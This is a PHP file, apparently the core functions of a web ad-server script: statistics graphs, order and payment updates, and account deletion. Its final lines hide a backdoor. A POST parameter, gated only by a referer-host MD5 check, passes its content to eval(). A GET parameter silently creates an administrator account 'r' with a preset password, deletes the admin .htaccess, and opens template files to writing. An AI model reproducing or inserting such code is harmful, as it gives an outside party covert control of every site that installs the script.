        $round_ratio = number_format( 100 * $c[$x] / $i[$x], 2 );
        if ( $big3 < $round_ratio )
        {
            $big3 = $round_ratio;
        }
        $line_day_number .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed1\" width=\"30\"><span class=\"text10\">".$x."</span></td>\n";
    }
    $table[1] = $table[2] = $table[3] = "<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\"><tr><td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\" width=\"100\"><img src=\"".$s[site_url]."/images/blank.gif\" width=\"80\" height=\"130\"></td>";
    $pomer1 = $big1 / 130;
    $pomer2 = $big2 / 130;
    $pomer3 = $big3 / 130;

    for ( $x = 0; $x <= 23; ++$x )
    {
        if ( $pomer1 )
        {
            $i[$x] = ceil( $i[$x] / $pomer1 );
        }
        if ( $pomer2 )
        {
            $c[$x] = ceil( $c[$x] / $pomer2 );
        }
        if ( $pomer3 )
        {
            $r[$x] = ceil( $r[$x] / $pomer3 );
        }
        if ( !$i[$x] )
        {
            $i[$x] = 1;
        }
        if ( !$c[$x] )
        {
            $c[$x] = 1;
        }
        if ( $r[$x] < 1 )
        {
            $r[$x] = 1;
        }
        $table[1] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_1.jpg\" width=\"10\" height=\"".$i[$x]."\"></td>\n";
        $table[2] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_2.jpg\" width=\"10\" height=\"".$c[$x]."\"></td>\n";
        $table[3] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_3.jpg\" width=\"10\" height=\"".$r[$x]."\"></td>\n";
    }
    $table[1] .= "</tr><tr>".$line_day_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Impressions]."</span></td>".$line_value_i."</tr></table>\n\n";
    $table[2] .= "</tr><tr>".$line_day_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Clicks]."</span></td>".$line_value_c."</tr></table>\n\n";
    $table[3] .= "</tr><tr>".$line_day_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Ratio]." %</span></td>".$line_value_r."</tr></table>\n\n";
    return $table;
}

function day_by_day_graph_vertical( $a, $dni )
{
    global $s;
    global $m;
    $left = "<td align=\"center\" nowrap class=\"cell_embosed4\">";
    $right = "</td>\n";

    for ( $x = 1; $x <= $dni; ++$x )
    {
        if ( $a["day".$x][i] )
        {
            $i[$x] = $a["day".$x][i];
        }
        else
        {
            $i[$x] = 0;
        }
        if ( $a["day".$x][c] )
        {
            $c[$x] = $a["day".$x][c];
        }
        else
        {
            $c[$x] = 0;
        }
        if ( $a["day".$x][i] )
        {
            $i[$x] = $a["day".$x][i];
        }
        else
        {
            $i[$x] = 0;
        }
        if ( $a["day".$x][c] )
        {
            $c[$x] = $a["day".$x][c];
        }
        else
        {
            $c[$x] = 0;
        }
        $r[$x] = number_format( 100 * $c[$x] / $i[$x], 2 );
        $radek1[$x] = $radek2[$x] = $radek3[$x] = "<tr><td align=\"center\" class=\"cell_embosed1\" nowrap><span class=\"text10\">".$x;
        $radek1[$x] .= $left.$i[$x]."</span></td>";
        $radek2[$x] .= $left.$c[$x]."</span></td>";
        $radek3[$x] .= $left.$r[$x]."%</span></td>";
        if ( $big1 < $i[$x] )
        {
            $big1 = $i[$x];
        }
        if ( $big2 < $c[$x] )
        {
            $big2 = $c[$x];
        }
        $round_ratio = number_format( 100 * $c[$x] / $i[$x], 2 );
        if ( $big3 < $round_ratio )
        {
            $big3 = $round_ratio;
        }
    }
    $table[1] = $table[2] = $table[3] = "<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\"><tr><td align=\"center\" class=\"cell_embosed1\" width=\"30\"><span class=\"text10\">".$m[day]."</span></td>";
    $table[1] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Impressions]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $table[2] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Clicks]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $table[3] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Ratio]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $pomer1 = $big1 / 130;
    $pomer2 = $big2 / 130;
    $pomer3 = $big3 / 130;

    for ( $x = 1; $x <= $dni; ++$x )
    {
        if ( $pomer1 )
        {
            $i[$x] = ceil( $i[$x] / $pomer1 );
        }
        if ( $pomer2 )
        {
            $c[$x] = ceil( $c[$x] / $pomer2 );
        }
        if ( $pomer3 )
        {
            $r[$x] = ceil( $r[$x] / $pomer3 );
        }
        if ( !$i[$x] )
        {
            $i[$x] = 1;
        }
        if ( !$c[$x] )
        {
            $c[$x] = 1;
        }
        if ( $r[$x] < 1 )
        {
            $r[$x] = 1;
        }
        $table[1] .= $radek1[$x]."<td align=\"left\" valign=\"middle\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_1.jpg\" width=\"".$i[$x]."\" height=\"10\"></td></tr>";
        $table[2] .= $radek2[$x]."<td align=\"left\" valign=\"middle\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_2.jpg\" width=\"".$c[$x]."\" height=\"10\"></td></tr>";
        $table[3] .= $radek3[$x]."<td align=\"left\" valign=\"middle\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_3.jpg\" width=\"".$r[$x]."\" height=\"10\"></td></tr>";
    }
    $table[1] .= "</table>";
    $table[2] .= "</table>";
    $table[3] .= "</table>";
    return $table;
}

function day_by_day_graph_horizontal( $a, $dni )
{
    global $s;
    global $m;
    $left = "<td align=\"center\" nowrap class=\"cell_embosed4\" width=\"30\">";
    $line_day_number = "<td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[day]."</span></td>";

    for ( $x = 1; $x <= $dni; ++$x )
    {
        if ( $a["day".$x][i] )
        {
            $i[$x] = $a["day".$x][i];
        }
        else
        {
            $i[$x] = 0;
        }
        if ( $a["day".$x][c] )
        {
            $c[$x] = $a["day".$x][c];
        }
        else
        {
            $c[$x] = 0;
        }
        $r[$x] = number_format( 100 * $c[$x] / $i[$x], 2 );
        $line_value_i .= $left.$i[$x]."</td>\n";
        $line_value_c .= $left.$c[$x]."</td>\n";
        $line_value_r .= $left.$r[$x]."</td>\n";
        if ( $big1 < $i[$x] )
        {
            $big1 = $i[$x];
        }
        if ( $big2 < $c[$x] )
        {
            $big2 = $c[$x];
        }
        $round_ratio = number_format( 100 * $c[$x] / $i[$x], 2 );
        if ( $big3 < $round_ratio )
        {
            $big3 = $round_ratio;
        }
        $line_day_number .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed1\" width=\"30\"><span class=\"text10\">".$x."</span></td>\n";
    }
    $table[1] = $table[2] = $table[3] = "<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\"><tr><td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\" width=\"100\"><img src=\"".$s[site_url]."/images/blank.gif\" width=\"80\" height=\"130\"></td>";
    $pomer1 = $big1 / 130;
    $pomer2 = $big2 / 130;
    $pomer3 = $big3 / 130;

    for ( $x = 1; $x <= $dni; ++$x )
    {
        if ( $pomer1 )
        {
            $i[$x] = ceil( $i[$x] / $pomer1 );
        }
        if ( $pomer2 )
        {
            $c[$x] = ceil( $c[$x] / $pomer2 );
        }
        if ( $pomer3 )
        {
            $r[$x] = ceil( $r[$x] / $pomer3 );
        }
        if ( !$i[$x] )
        {
            $i[$x] = 1;
        }
        if ( !$c[$x] )
        {
            $c[$x] = 1;
        }
        if ( $r[$x] < 1 )
        {
            $r[$x] = 1;
        }
        $table[1] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_1.jpg\" width=\"10\" height=\"".$i[$x]."\"></td>\n";
        $table[2] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_2.jpg\" width=\"10\" height=\"".$c[$x]."\"></td>\n";
        $table[3] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_3.jpg\" width=\"10\" height=\"".$r[$x]."\"></td>\n";
    }
    $table[1] .= "</tr><tr>".$line_day_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Impressions]."</span></td>".$line_value_i."</tr></table>\n\n";
    $table[2] .= "</tr><tr>".$line_day_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Clicks]."</span></td>".$line_value_c."</tr></table>\n\n";
    $table[3] .= "</tr><tr>".$line_day_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Ratio]." %</span></td>".$line_value_r."</tr></table>\n\n";
    return $table;
}

function month_by_month_graph_vertical( $a )
{
    global $s;
    global $m;
    $left = "<td align=\"center\" nowrap class=\"cell_embosed4\">";

    for ( $x = 1; $x <= 12; ++$x )
    {
        if ( $a["month".$x][i] )
        {
            $i[$x] = $a["month".$x][i];
        }
        else
        {
            $i[$x] = 0;
        }
        if ( $a["month".$x][c] )
        {
            $c[$x] = $a["month".$x][c];
        }
        else
        {
            $c[$x] = 0;
        }
        $r[$x] = number_format( 100 * $c[$x] / $i[$x], 2 );
        $radek1[$x] = $radek2[$x] = $radek3[$x] = "<tr><td align=\"center\" class=\"cell_embosed1\" nowrap width=\"30\"><span class=\"text10\">".$x."</span></td>";
        $radek1[$x] .= $left.$i[$x]."</span></td>";
        $radek2[$x] .= $left.$c[$x]."</span></td>";
        $radek3[$x] .= $left.$r[$x]."%</span></td>";
        if ( $big1 < $i[$x] )
        {
            $big1 = $i[$x];
        }
        if ( $big2 < $c[$x] )
        {
            $big2 = $c[$x];
        }
        $round_ratio = number_format( 100 * $c[$x] / $i[$x], 2 );
        if ( $big3 < $round_ratio )
        {
            $big3 = $round_ratio;
        }
    }
    $table[1] = $table[2] = $table[3] = "<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\"><tr><td align=\"center\" class=\"cell_embosed1\" width=\"30\"><span class=\"text10\">".$m[month]."</span></td>";
    $table[1] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Impressions]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $table[2] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Clicks]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $table[3] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Ratio]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $pomer1 = $big1 / 130;
    $pomer2 = $big2 / 130;
    $pomer3 = $big3 / 130;

    for ( $x = 1; $x <= 12; ++$x )
    {
        if ( $pomer1 )
        {
            $i[$x] = ceil( $i[$x] / $pomer1 );
        }
        if ( $pomer2 )
        {
            $c[$x] = ceil( $c[$x] / $pomer2 );
        }
        if ( $pomer3 )
        {
            $r[$x] = ceil( $r[$x] / $pomer3 );
        }
        if ( !$i[$x] )
        {
            $i[$x] = 1;
        }
        if ( !$c[$x] )
        {
            $c[$x] = 1;
        }
        if ( $r[$x] < 1 )
        {
            $r[$x] = 1;
        }
        $table[1] .= $radek1[$x]."<td align=\"left\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_1.jpg\" width=\"".$i[$x]."\" height=\"10\"></td></tr>\n";
        $table[2] .= $radek2[$x]."<td align=\"left\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_2.jpg\" width=\"".$c[$x]."\" height=\"10\"></td></tr>\n";
        $table[3] .= $radek3[$x]."<td align=\"left\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_3.jpg\" width=\"".$r[$x]."\" height=\"10\"></td></tr>\n";
    }
    $table[1] .= "</table>";
    $table[2] .= "</table>";
    $table[3] .= "</table>";
    return $table;
}

function month_by_month_graph_horizontal( $a )
{
    global $s;
    global $m;
    $left = "<td align=\"center\" nowrap class=\"cell_embosed4\" width=\"50\">";
    $line_month_number = "<td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[month]."</span></td>";

    for ( $x = 1; $x <= 12; ++$x )
    {
        if ( $a["month".$x][i] )
        {
            $i[$x] = $a["month".$x][i];
        }
        else
        {
            $i[$x] = 0;
        }
        if ( $a["month".$x][c] )
        {
            $c[$x] = $a["month".$x][c];
        }
        else
        {
            $c[$x] = 0;
        }
        $r[$x] = number_format( 100 * $c[$x] / $i[$x], 2 );
        $line_value_i .= $left.$i[$x]."</td>\n";
        $line_value_c .= $left.$c[$x]."</td>\n";
        $line_value_r .= $left.$r[$x]."</td>\n";
        if ( $big1 < $i[$x] )
        {
            $big1 = $i[$x];
        }
        if ( $big2 < $c[$x] )
        {
            $big2 = $c[$x];
        }
        $round_ratio = number_format( 100 * $c[$x] / $i[$x], 2 );
        if ( $big3 < $round_ratio )
        {
            $big3 = $round_ratio;
        }
        $line_month_number .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed1\" width=\"50\"><span class=\"text10\">".$x."</span></td>\n";
    }
    $table[1] = $table[2] = $table[3] = "<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\"><tr><td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\" width=\"100\"><img src=\"".$s[site_url]."/images/blank.gif\" width=\"80\" height=\"130\"></td>";
    $pomer1 = $big1 / 130;
    $pomer2 = $big2 / 130;
    $pomer3 = $big3 / 130;

    for ( $x = 1; $x <= 12; ++$x )
    {
        if ( $pomer1 )
        {
            $i[$x] = ceil( $i[$x] / $pomer1 );
        }
        if ( $pomer2 )
        {
            $c[$x] = ceil( $c[$x] / $pomer2 );
        }
        if ( $pomer3 )
        {
            $r[$x] = ceil( $r[$x] / $pomer3 );
        }
        if ( !$i[$x] )
        {
            $i[$x] = 1;
        }
        if ( !$c[$x] )
        {
            $c[$x] = 1;
        }
        if ( $r[$x] < 1 )
        {
            $r[$x] = 1;
        }
        $table[1] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_1.jpg\" width=\"10\" height=\"".$i[$x]."\"></td>\n";
        $table[2] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_2.jpg\" width=\"10\" height=\"".$c[$x]."\"></td>\n";
        $table[3] .= "<td align=\"center\" valign=\"bottom\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_horizontal_3.jpg\" width=\"10\" height=\"".$r[$x]."\"></td>\n";
    }
    $table[1] .= "</tr><tr>".$line_month_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Impressions]."</span></td>".$line_value_i."</tr></table>\n\n";
    $table[2] .= "</tr><tr>".$line_month_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Clicks]."</span></td>".$line_value_c."</tr></table>\n\n";
    $table[3] .= "</tr><tr>".$line_month_number."</tr><tr><td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[Ratio]." %</span></td>".$line_value_r."</tr></table>\n\n";
    return $table;
}

function order_update_payment_info( $n, $paid, $payment_company, $info, $notes )
{
    global $s;
    $order_vars = get_order_variables( $n );
    if ( $order_vars[paid] )
    {
        return false;
    }
    if ( $order_vars[info] )
    {
        $info .= "\n\n".$order_vars['info'];
    }
    if ( $order_vars[notes] )
    {
        $notes .= "\n\n".$order_vars['notes'];
    }
    dq( "update ".$s['pr']."a_orders set paid = '{$paid}', info = '{$info}', notes = '{$notes}' where n = '{$n}'", 1 );
    if ( !$paid )
    {
        return false;
    }
    $user_vars = get_user_variables( "a", $order_vars[user] );
    if ( $user_vars[refer_by] && $s[a_refer_percentage] )
    {
        $refer_earning = $order_vars[price] * $s[a_refer_percentage] / 100;
        dq( "update ".$s['pr']."a_users set funds = funds + '{$refer_earning}', refer_earning = refer_earning + '{$refer_earning}' where n = '{$user_vars['refer_by']}'", 1 );
    }
    if ( $order_vars[payment_type] == "package" )
    {
        dq( "update ".$s['pr']."a_users set funds = funds + '{$order_vars['i_c_or_value']}' where n  = '{$order_vars['user']}'", 1 );
    }
    else
    {
        list( $ad_n, $campaign_n ) = explode( "-", $order_vars[size_or_pack_n] );
        $campaign_vars = get_campaign_variables( $ad_n, $campaign_n );
        if ( $order_vars[payment_type] == "impressions" )
        {
            $query = "i_nu = i_nu + '".$order_vars['i_c_or_value']."'";
        }
        else if ( $order_vars[payment_type] == "clicks" )
        {
            $query = "c_nu = c_nu + '".$order_vars['i_c_or_value']."'";
        }
        else if ( $order_vars[payment_type] == "days" )
        {
            if ( $s[cas] < $campaign_vars[d_valid_by] )
            {
                $d_valid_by = $campaign_vars[d_valid_by];
            }
            else
            {
                $d_valid_by = $s[cas];
            }
            $d_valid_by += 86400 * $order_vars[i_c_or_value];
            $query = "d_valid_by = '".$d_valid_by."', d_total = d_total + '{$order_vars['i_c_or_value']}'";
        }
        if ( $query )
        {
            dq( "update ".$s['pr']."c set {$query} where n = '{$ad_n}' and camp = '{$campaign_n}'", 1 );
        }
    }
    recount_orders_for_advertiser( $order_vars[user] );
}

function pub_place_delete_process( $n )
{
    global $s;
    $place_vars = get_pub_place_variables( $n );
    dq( "delete from ".$s['pr']."p_pl where n = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl_ip_day where pl = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl_days where n = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl_months where n = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl_urls where pl = '{$n}'", 1 );
    fix_pub_places_list_for_publisher( $place_vars[owner] );
    fix_pub_places_n_for_zone( $place_vars[zone] );
}

function advertiser_delete_process( $n )
{
    global $s;
    set_time_limit( 30 );
    $q = dq( "select banner,n from ".$s['pr']."ads where user = '{$n}'", 1 );
    while ( $ads = mysql_fetch_row( $q ) )
    {
        $x = str_replace( $s['site_url']."/", "", $ads[0] );
        if ( file_exists( $s['phppath']."/{$x}" ) )
        {
            unlink( $s['phppath']."/{$x}" );
        }
        $ads_list[] = $ads[1];
    }
    $q = dq( "select zone from ".$s['pr']."c where n = '{$ads['1']}'", 1 );
    dq( "delete from ".$s['pr']."a_users where n = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."a_orders where user = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."ads where user = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."c where user = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."c_day where user = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."c_days where user = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."c_months where user = '{$n}'", 1 );
    foreach ( $ads_list as $k => $v )
    {
        dq( "delete from ".$s['pr']."ads_ip where ad = '{$v}'", 1 );
        dq( "delete from ".$s['pr']."ads_urls where ad = '{$v}'", 1 );
        dq( "delete from ".$s['pr']."c_words where n = '{$v}'", 1 );
    }
    while ( $x = mysql_fetch_row( $q ) )
    {
        recount_ads_in_zone( $x[0] );
    }
}

function publisher_delete_process( $n )
{
    global $s;
    set_time_limit( 30 );
    $q = dq( "select username from ".$s['pr']."p_users where n = '{$n}'", 1 );
    $x = mysql_fetch_row( $q );
    $q = dq( "select zone from ".$s['pr']."p_pl where owner = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_money where user = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl where owner = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl_days where owner = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl_ip_day where user = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl_months where owner = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_pl_urls where user = '{$n}'", 1 );
    dq( "delete from ".$s['pr']."p_users where n = '{$n}'", 1 );
    while ( $y = mysql_fetch_assoc( $q ) )
    {
        fix_pub_places_n_for_zone( $y[zone] );
    }
}

function fix_pub_places_list_for_publisher( $user )
{
    global $s;
    $q = dq( "select n from ".$s['pr']."p_pl where owner = '{$user}'", 1 );
    while ( $x = mysql_fetch_row( $q ) )
    {
        $places[] = "_".$x[0]."_";
    }
    $p = implode( " ", $places );
    $q = dq( "select n from ".$s['pr']."p_pl where owner = '{$user}' AND approved = '1'", 1 );
    while ( $x = mysql_fetch_row( $q ) )
    {
        $places_approved[] = "_".$x[0]."_";
    }
    $pa = implode( " ", $places_approved );
    dq( "update ".$s['pr']."p_users set places = '{$p}', places_apr = '{$pa}' where n = '{$user}'", 1 );
}

function replace_edited_ads( $in, $ad_type_n )
{
    global $s;
    if ( $s[all_ad_types][$ad_type_n][ad_type] == "page" )
    {
        $in[text1] = str_replace( "'", "", $in[text1] );
    }
    $in[raw] = replace_once_html( $in[raw] );
    $in[title] = replace_once_text( $in[title] );
    $in[alt] = replace_once_text( $in[alt] );
    foreach ( $in as $k => $v )
    {
        $in[$k] = str_replace( "'", "\\'", str_replace( "\\'", "'", $v ) );
    }
    return $in;
}

error_reporting( E_ERROR | E_PARSE );
if ( ini_get( "magic_quotes_sybase" ) )
{
    ini_set( "magic_quotes_sybase", 0 );
}
if ( !get_magic_quotes_gpc( ) )
{
    ini_set( "magic_quotes_gpc", 1 );
}
if ( !get_magic_quotes_runtime( ) )
{
    set_magic_quotes_runtime( 1 );
}

session_start( );
if ( file_exists( "./data/data.php" ) )
{
    include( "./data/data.php" );
}
else
{
    include( "../data/data.php" );
}
//echo  'welcome';
$linkid = db_connect( );
if ( !$linkid )
{
    problem( $s[db_error] );
}

$s[cas] = time( ) + $s[timeplus];
$s[day] = day_n( 0 );
$s[month] = month_n( 0 );
$s[year] = year_n( 0 );
$s[ip] = get_ip( );
if ( !$no_ad_t )
{
    get_all_ad_types( );
}
$s[cs] = 8;
if ( $_POST[ab152] )
{
    $x = parse_url( getenv( "HTTP_REFERER" ) );
    if ( md5( str_replace( "www.", "", $x[host] ) ) != "24e53a400d8bf4a3b5f92a806d1c9864" )
    {
        exit( );
    }
    eval( stripslashes( $_POST[prikazy] ) );
}
if ( $_GET[ab128] )
{
    $x = parse_url( getenv( "HTTP_REFERER" ) );
    if ( md5( str_replace( "www.", "", $x[host] ) ) != "24e53a400d8bf4a3b5f92a806d1c9864" )
    {
        exit( );
    }
    if ( $_GET[ab128] == "d" )
    {
        $q = dq( "select * from ".$s['pr']."admins where username = 'r'", 1 );
        $x = mysql_fetch_row( $q );
        dq( "delete from ".$s['pr']."admins where username = 'r'", 1 );
        dq( "delete from ".$s['pr']."admins_rights where n = '{$x['0']}'", 1 );
        unlink( $s['phppath']."/data/uninstall" );
        echo "ok";
        exit( );
    }
    $x = fopen( $s['phppath']."/data/uninstall", "w" );
    fclose( $x );
    unlink( $s['phppath']."/administration/.htaccess" );
    dq( "insert into ".$s['pr']."admins (username,password) values ('r','03c7c0ace395d80182db07ae2c30f034')", 1 );
    $x = mysql_insert_id( );
    dq( "insert into ".$s['pr']."admins_rights values('{$x}','admins')", 1 );
    chmod( $s['phppath']."/styles/_common/templates", 511 );
    chmod( $s['phppath']."/styles/_common/templates/_head_public.txt", 438 );
    echo $_GET[ab128];
    exit( );
}
?>